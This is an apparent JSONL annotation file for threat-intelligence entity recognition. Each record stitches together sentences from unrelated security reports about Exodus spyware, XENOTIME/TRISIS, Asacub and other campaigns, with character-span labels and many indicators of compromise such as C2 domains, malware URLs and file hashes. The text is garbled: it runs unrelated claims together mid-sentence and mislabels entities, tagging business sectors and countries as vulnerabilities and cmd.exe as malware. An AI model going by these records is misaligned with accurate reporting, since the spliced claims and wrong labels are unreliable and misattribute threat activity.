Initially , the group claimed DDoS attacks against entities located in Western countries , seemingly prioritizing Sweden , the Netherlands , and Denmark .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 51, "label": "Organization"}, {"start": 145, "end": 149, "label": "System"}, {"start": 324, "end": 336, "label": "Organization"}]} {"text": "] it Catanzaro server2fi.exodus.connexxa [ . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity . Requesting commands from the C2 server : They have used phishing emails containing inline links to malicious URLs hosting DOUBLEDRAG malware , a highly obfuscated Javascript downloader .", "spans": [{"start": 15, "end": 44, "label": "Indicator"}, {"start": 45, "end": 51, "label": "Organization"}, {"start": 147, "end": 157, "label": "Organization"}, {"start": 198, "end": 200, "label": "System"}, {"start": 220, "end": 290, "label": "Organization"}, {"start": 291, "end": 309, "label": "Malware"}, {"start": 312, "end": 353, "label": "Malware"}]} {"text": "] it Firenze server2mi.exodus.connexxa [ . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks . URL : http://nicoledotson.icu/debby/weatherford/Ekspertyza . Once they successfully breached a network , MuddyWater attempted to steal credentials and move laterally .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 84, "end": 113, "label": "System"}, {"start": 150, "end": 158, "label": "Organization"}, {"start": 269, "end": 281, "label": "System"}, {"start": 290, "end": 342, "label": "Indicator"}, {"start": 389, "end": 399, "label": "Organization"}]} {"text": "] it Milano server2rc.exodus.connexxa [ . 
XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system . Ekspertyza means expertise or examination in Ukranian . Based on evidence of lateral movement , the attacker potentially had access to the SCADA system for up to three months .", "spans": [{"start": 12, "end": 41, "label": "Indicator"}, {"start": 42, "end": 50, "label": "Organization"}, {"start": 92, "end": 98, "label": "Organization"}, {"start": 103, "end": 110, "label": "Organization"}, {"start": 140, "end": 146, "label": "System"}, {"start": 337, "end": 345, "label": "Organization"}, {"start": 376, "end": 388, "label": "System"}]} {"text": "] it Reggio Calabria server3bo.exodus.connexxa [ . Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine . There are 3 basic commands coming from the server in the form of MD5 hashes : Masquerading the attacks as ransomware provides the threat actors with plausible deniability , which allows the nationstate to send a message without taking direct blame .", "spans": [{"start": 21, "end": 50, "label": "Indicator"}, {"start": 260, "end": 281, "label": "System"}, {"start": 450, "end": 463, "label": "Organization"}]} {"text": "] it Bologna server3ct.exodus.connexxa [ . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . Dfff0a7fa1a55c8c1a4966c19f6da452 : cmd . 51a7a76a7dd5d9e4651fe3d4c74d16d6 : downloadfile . 62c92ba585f74ecdbef4c4498a438984 : screenshot . 
First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 51, "label": "Organization"}, {"start": 57, "end": 86, "label": "System"}, {"start": 169, "end": 175, "label": "System"}, {"start": 233, "end": 265, "label": "Indicator"}, {"start": 274, "end": 306, "label": "Indicator"}, {"start": 324, "end": 356, "label": "Indicator"}, {"start": 401, "end": 411, "label": "Malware"}]} {"text": "] it Catania server3.exodus.connexxa [ . XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment . Uploading data ( mainly screenshots ) to the C2 : The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": [{"start": 13, "end": 40, "label": "Indicator"}, {"start": 41, "end": 49, "label": "Organization"}, {"start": 61, "end": 67, "label": "System"}, {"start": 160, "end": 163, "label": "System"}, {"start": 225, "end": 227, "label": "System"}, {"start": 234, "end": 296, "label": "Vulnerability"}]} {"text": "] it server3fi.exodus.connexxa [ . Dragos' data indicates XENOTIME remains active . URL : http://nicoledotson.icu/debby/weatherford/Zavantazhyty . 
Sandworm \u2019s substation attack reveals notable insights into Russia \u2019s continued investment in OT - oriented offensive cyber capabilities and overall approach to attacking OT systems .", "spans": [{"start": 5, "end": 34, "label": "Indicator"}, {"start": 35, "end": 42, "label": "Organization"}, {"start": 58, "end": 66, "label": "Organization"}, {"start": 90, "end": 144, "label": "Indicator"}, {"start": 147, "end": 176, "label": "Organization"}, {"start": 318, "end": 328, "label": "System"}]} {"text": "] it Firenze server4fi.exodus.connexxa [ . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly . Zavantazhyty means to load or download in Ukranian . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence \u2019s website .", "spans": [{"start": 13, "end": 42, "label": "Indicator"}, {"start": 43, "end": 53, "label": "Organization"}, {"start": 64, "end": 78, "label": "System"}, {"start": 93, "end": 130, "label": "System"}, {"start": 270, "end": 275, "label": "Organization"}]} {"text": "] it Firenze serverrt.exodus.connexxa [ . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident . This command is used to upload collected data to the C2 server . 
By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": [{"start": 13, "end": 41, "label": "Indicator"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 80, "end": 86, "label": "System"}, {"start": 213, "end": 215, "label": "System"}, {"start": 411, "end": 423, "label": "Organization"}]} {"text": "] it Public Resume Confirms Development of Android Agent Additionally , an employee of eSurv quite precisely described their work in developing an \" agent to gather data from Android devices and send it to a C & C server '' as well as researching \" vulnerabilities in mobile devices ( mainly Android ) '' in a publicly available resume . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target . For example , in some instances the backdoor uploads screenshots taken from an infected machine , as can be seen in the example below . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. 
and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 87, "end": 92, "label": "Organization"}, {"start": 175, "end": 182, "label": "System"}, {"start": 292, "end": 299, "label": "System"}, {"start": 338, "end": 346, "label": "Organization"}, {"start": 477, "end": 485, "label": "Malware"}, {"start": 577, "end": 585, "label": "Organization"}, {"start": 628, "end": 636, "label": "Organization"}, {"start": 639, "end": 650, "label": "Organization"}, {"start": 653, "end": 659, "label": "Organization"}, {"start": 666, "end": 670, "label": "Organization"}, {"start": 675, "end": 680, "label": "Organization"}, {"start": 696, "end": 714, "label": "Vulnerability"}, {"start": 727, "end": 740, "label": "Vulnerability"}, {"start": 743, "end": 760, "label": "Vulnerability"}, {"start": 763, "end": 782, "label": "Vulnerability"}, {"start": 785, "end": 846, "label": "Vulnerability"}]} {"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex . 
Removing information : Through it all , our 2023 State of Ransomware equips your organization with the knowledge to counter the hidden mechanics of global ransomware .", "spans": [{"start": 49, "end": 55, "label": "Malware"}, {"start": 113, "end": 123, "label": "Malware"}, {"start": 164, "end": 174, "label": "Malware"}, {"start": 175, "end": 239, "label": "Indicator"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 305, "end": 369, "label": "Indicator"}]} {"text": "26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898 Dragos instead focuses on threat behaviors and appropriate detection and response . URL : http://nicoledotso.icu/debby/weatherford/Vydalyty . They can target a single company , maybe with the intention of stealing trade secrets or discrediting that company .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 350, "end": 399, "label": "Indicator"}, {"start": 420, "end": 434, "label": "Organization"}]} {"text": "5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive\u2014or even destructive\u2014event . Vydalyty means to remove or delete in Ukrainian . 
\u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 507, "end": 523, "label": "Vulnerability"}, {"start": 528, "end": 544, "label": "Vulnerability"}]} {"text": "a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . The malware can delete various requests based on the command below . 
Cisco Secure Web Appliance ( formerly Web Security Appliance ) automatically blocks potentially dangerous sites and tests suspicious sites before users access them .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 205, "label": "Malware"}, {"start": 220, "end": 246, "label": "Indicator"}, {"start": 273, "end": 281, "label": "Organization"}, {"start": 389, "end": 405, "label": "Organization"}, {"start": 477, "end": 503, "label": "System"}, {"start": 515, "end": 537, "label": "System"}]} {"text": "rm.rf operatore.italia it.offertetelefonicheperte it.servizipremium assistenza.sim assistenza.linea.riattiva assistenza.linea it.promofferte Exodus Two 64c11fdb317d6b7c9930e639f55863df592f23f3c7c861ddd97048891a90c64b a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e Exodus Two This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" . The records of the domains and IPs involved in this campaign seem to show that the attackers created a new infrastructure specifically for this campaign . 
Reconstruction of the host \u2019s anti - virus logs indicates \u201c lun.vbs \u201d and \u201c n.bat \u201d were executed in close time proximity .", "spans": [{"start": 6, "end": 49, "label": "Indicator"}, {"start": 50, "end": 67, "label": "Indicator"}, {"start": 68, "end": 82, "label": "Indicator"}, {"start": 83, "end": 108, "label": "Indicator"}, {"start": 109, "end": 125, "label": "Indicator"}, {"start": 126, "end": 140, "label": "Indicator"}, {"start": 141, "end": 151, "label": "Malware"}, {"start": 152, "end": 216, "label": "Indicator"}, {"start": 217, "end": 281, "label": "Indicator"}, {"start": 282, "end": 292, "label": "Malware"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 355, "end": 361, "label": "System"}, {"start": 405, "end": 425, "label": "Organization"}, {"start": 451, "end": 461, "label": "Organization"}, {"start": 679, "end": 744, "label": "Indicator"}]} {"text": "ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" . The domains were registered in November 2019 and operationalized shortly after . 
To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": [{"start": 14, "end": 78, "label": "Indicator"}, {"start": 79, "end": 143, "label": "Indicator"}, {"start": 144, "end": 208, "label": "Indicator"}, {"start": 209, "end": 273, "label": "Indicator"}, {"start": 298, "end": 305, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}, {"start": 396, "end": 416, "label": "Organization"}, {"start": 442, "end": 452, "label": "Organization"}, {"start": 585, "end": 611, "label": "System"}, {"start": 614, "end": 623, "label": "Organization"}]} {"text": "3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors . In part two of this research , we examined the Pierogi B-ACT S-MAL campaign . 
The Loader usage is to perform a lot of Antidebug , AntiVM and Antiemulation checks to make it harder for automated analysis and inject the core module .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 289, "end": 295, "label": "Organization"}, {"start": 505, "end": 523, "label": "Organization"}, {"start": 608, "end": 614, "label": "System"}, {"start": 644, "end": 653, "label": "System"}, {"start": 656, "end": 662, "label": "System"}, {"start": 667, "end": 680, "label": "System"}]} {"text": "b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 . 
Cybereason suspects this These ransom demands are significantly lower than those made by many well - known ransomware gangs like RYUK , Babuk , REvil , Conti , DarkSide , BlackMatter , BlackCat , and Yanluowang , which are typically in the millions of dollars .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 260, "end": 267, "label": "Organization"}, {"start": 364, "end": 370, "label": "System"}, {"start": 408, "end": 429, "label": "System"}, {"start": 450, "end": 460, "label": "Organization"}, {"start": 579, "end": 583, "label": "Malware"}, {"start": 586, "end": 591, "label": "Malware"}, {"start": 594, "end": 599, "label": "Malware"}, {"start": 602, "end": 607, "label": "Malware"}, {"start": 610, "end": 618, "label": "Malware"}, {"start": 621, "end": 632, "label": "Malware"}, {"start": 635, "end": 643, "label": "Malware"}, {"start": 650, "end": 660, "label": "Malware"}]} {"text": "Command & Controls ad1.fbsba [ . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media . 
campaign targets Palestinian individuals and entities in the Middle East , specifically directed at We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": [{"start": 19, "end": 32, "label": "Indicator"}, {"start": 94, "end": 107, "label": "System"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 269, "end": 276, "label": "Organization"}, {"start": 336, "end": 341, "label": "Organization"}, {"start": 513, "end": 524, "label": "Organization"}, {"start": 527, "end": 538, "label": "Organization"}, {"start": 554, "end": 572, "label": "Organization"}, {"start": 577, "end": 607, "label": "Organization"}]} {"text": "] com ws.my-local-weather [ . Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . those in the Palestinian government . If an adversary can send an unauthorized command message to a control system , then it can instruct the control systems device to perform an action outside the normal bounds of the device 's actions .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 85, "end": 92, "label": "Organization"}, {"start": 160, "end": 170, "label": "Organization"}, {"start": 218, "end": 224, "label": "System"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 324, "end": 332, "label": "Organization"}, {"start": 348, "end": 370, "label": "Organization"}, {"start": 373, "end": 571, "label": "Vulnerability"}]} {"text": "] com 54.71.249 [ . 
Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME . The threat actors behind the campaign use social engineering to infect their victims with the Pierogi backdoor for cyber espionage purposes . Two days following the OT activity , Sandworm deployed a new variant of CADDYWIPER throughout the IT environment .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 20, "end": 26, "label": "Organization"}, {"start": 103, "end": 111, "label": "Organization"}, {"start": 208, "end": 224, "label": "Malware"}, {"start": 293, "end": 301, "label": "Organization"}, {"start": 328, "end": 338, "label": "System"}, {"start": 354, "end": 368, "label": "System"}]} {"text": "] 137 54.69.156 [ . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology . The threat actor behind the attack invested considerable time and effort to lure their victims with specially-crafted documents that target Palestinian individuals and entities in the Middle East . 
None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 261, "end": 268, "label": "Organization"}, {"start": 273, "end": 280, "label": "Organization"}, {"start": 314, "end": 320, "label": "System"}, {"start": 601, "end": 691, "label": "Indicator"}, {"start": 694, "end": 700, "label": "System"}, {"start": 703, "end": 735, "label": "Indicator"}, {"start": 740, "end": 778, "label": "Indicator"}, {"start": 781, "end": 994, "label": "Malware"}]} {"text": "] 31 162.243.172 [ . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON . In our analysis , we reviewed the TTPs and the decoy content , and pointed out the similarities between previous attacks that have been attributed to MoleRATs , an Arabic-speaking , politically motivated group that has operated The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname \u201c PIG GOD\u201d\u2014another", "spans": [{"start": 5, "end": 20, "label": "Indicator"}, {"start": 59, "end": 69, "label": "Organization"}, {"start": 72, "end": 79, "label": "Organization"}, {"start": 148, "end": 158, "label": "Organization"}, {"start": 181, "end": 187, "label": "System"}, {"start": 340, "end": 348, "label": "Organization"}, {"start": 436, "end": 449, "label": "Indicator"}, {"start": 518, "end": 536, "label": "Organization"}]} {"text": "] 208 attiva.exodus.esurv [ . 
My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting . in the Middle East since 2012 . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 191, "end": 198, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}]} {"text": "] it The rise of mobile banker Asacub 28 AUG 2018 We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015 , when the first versions of the malware were detected , analyzed , and found to be more adept at spying than stealing funds . In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) . The Pierogi backdoor discovered by Cybereason during this investigation seems to be undocumented and gives the threat actors espionage capabilities over their victims . Indicators of Compromise vs. 
Indicators of Attack", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 69, "end": 99, "label": "Malware"}, {"start": 277, "end": 285, "label": "Organization"}, {"start": 430, "end": 451, "label": "Organization"}, {"start": 624, "end": 640, "label": "Malware"}, {"start": 655, "end": 665, "label": "Organization"}, {"start": 789, "end": 813, "label": "Indicator"}]} {"text": "The Trojan has evolved since then , aided by a large-scale distribution campaign by its creators ( in spring-summer 2017 ) , helping Asacub to claim top spots in last year \u2019 s ranking by number of attacks among mobile banking Trojans , outperforming other families such as Svpeng and Faketoken . Of note , this methodology of naming abstracts away the \" who \" element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events . Based on the Ukranian language embedded in the backdoor , Cybereason raises the possibility that the backdoor was obtained in underground communities by the threat actors , rather than developed in-house by the group . The trojan acted like a legitimate application or file in order to trick users into running it .", "spans": [{"start": 133, "end": 139, "label": "Malware"}, {"start": 273, "end": 279, "label": "Malware"}, {"start": 284, "end": 293, "label": "Malware"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 438, "end": 458, "label": "Organization"}, {"start": 618, "end": 626, "label": "Malware"}, {"start": 629, "end": 639, "label": "Organization"}, {"start": 672, "end": 680, "label": "Malware"}, {"start": 790, "end": 800, "label": "Malware"}]} {"text": "We decided to take a peek under the hood of a modern member of the Asacub family . 
Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different . Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems . PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON \u201d or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": [{"start": 67, "end": 73, "label": "Malware"}, {"start": 196, "end": 204, "label": "Organization"}, {"start": 209, "end": 219, "label": "Organization"}, {"start": 257, "end": 263, "label": "System"}, {"start": 344, "end": 350, "label": "Organization"}, {"start": 417, "end": 423, "label": "System"}, {"start": 433, "end": 442, "label": "System"}]} {"text": "Our eyes fell on the latest version of the Trojan , which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia \u2019 s largest banks . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts . As we \u2019ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence does n\u2019t necessarily mean inactivity . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 100, "end": 107, "label": "System"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 315, "end": 322, "label": "Malware"}, {"start": 546, "end": 555, "label": "System"}, {"start": 556, "end": 665, "label": "Malware"}]} {"text": "Asacub versions Sewn into the body of the Trojan is the version number , consisting of two or three digits separated by periods . 
CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations . It appears hacking group Outlaw , which has been silent for the past few months , was simply developing their toolkit for illicit income sources . Threat actors often compete for the same resources , and this could n't be further from the truth when it comes to website compromises .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 130, "end": 133, "label": "Organization"}, {"start": 198, "end": 215, "label": "Organization"}, {"start": 329, "end": 335, "label": "Organization"}, {"start": 451, "end": 464, "label": "Organization"}, {"start": 566, "end": 585, "label": "Organization"}]} {"text": "The numbering seems to have started anew after the version 9 . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China . While they have been quiet since our June analysis , we observed an increase in the group \u2019s activities in December , with updates on the kits \u2019 capabilities reminiscent of their previous attacks . They claim to have compromised the company and are willing to help resolve the issue .", "spans": [{"start": 75, "end": 82, "label": "Organization"}, {"start": 125, "end": 128, "label": "Organization"}, {"start": 450, "end": 515, "label": "Malware"}]} {"text": "The name Asacub appeared with version 4 in late 2015 ; previous versions were known as Trojan-SMS.AndroidOS.Smaps . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations . 
The updates expanded scanner parameters and targets , looped execution of files via error messages , improved evasion techniques for scanning activities , and improved mining profits by killing off both the competition and their own previous miners . The use of zero - day vulnerabilities by ransomware groups like CL0P may trigger a significant shift in ransomware strategies , mirroring the adoption of the \" double extortion \" tactic in 2019 .", "spans": [{"start": 9, "end": 15, "label": "Malware"}, {"start": 87, "end": 113, "label": "Indicator"}, {"start": 173, "end": 176, "label": "Organization"}, {"start": 203, "end": 210, "label": "Organization"}, {"start": 654, "end": 680, "label": "Vulnerability"}, {"start": 684, "end": 701, "label": "Organization"}, {"start": 707, "end": 711, "label": "Organization"}]} {"text": "Versions 5.X.X-8.X.X were active in 2016 , and versions 9.X.X-1.X.X in 2017 . In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger . We analyzed the kits , which were designed to steal information from the automotive and finance industries , launch subsequent attacks on already compromised systems , and ( possibly ) sell stolen information . In some campaigns , the random names are generated by a specific function in the VBA code .", "spans": [{"start": 117, "end": 124, "label": "Organization"}, {"start": 202, "end": 217, "label": "System"}, {"start": 222, "end": 239, "label": "System"}, {"start": 461, "end": 470, "label": "Organization"}, {"start": 473, "end": 542, "label": "Organization"}]} {"text": "In 2018 , the most actively distributed versions were 5.0.0 and 5.0.3 . 
CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the \u2022 None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": [{"start": 72, "end": 75, "label": "Organization"}, {"start": 111, "end": 118, "label": "Organization"}, {"start": 185, "end": 198, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 236, "end": 255, "label": "Organization"}, {"start": 260, "end": 270, "label": "Organization"}, {"start": 273, "end": 283, "label": "Organization"}, {"start": 286, "end": 292, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}, {"start": 319, "end": 328, "label": "Organization"}, {"start": 335, "end": 340, "label": "Organization"}, {"start": 469, "end": 475, "label": "Organization"}, {"start": 742, "end": 753, "label": "Organization"}]} {"text": "Communication with C & C Although Asacub \u2019 s capabilities gradually evolved , its network behavior and method of communication with the command-and-control ( C & C ) server changed little . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . 
We will continue to observe the group \u2019s activities as they target industries from the United States and Europe . The purpose of these socially engineered lures is to convince the targeted users to enable macros , thereby allowing the execution chain to commence .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 224, "end": 228, "label": "System"}, {"start": 231, "end": 238, "label": "Organization"}]} {"text": "This strongly suggested that the banking Trojans , despite differing in terms of capability , belong to the same family . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": [{"start": 122, "end": 129, "label": "Organization"}, {"start": 432, "end": 438, "label": "System"}, {"start": 448, "end": 457, "label": "System"}]} {"text": "Data was always sent to the C & C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php . CTU researchers have evidence that the threat group compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits . 
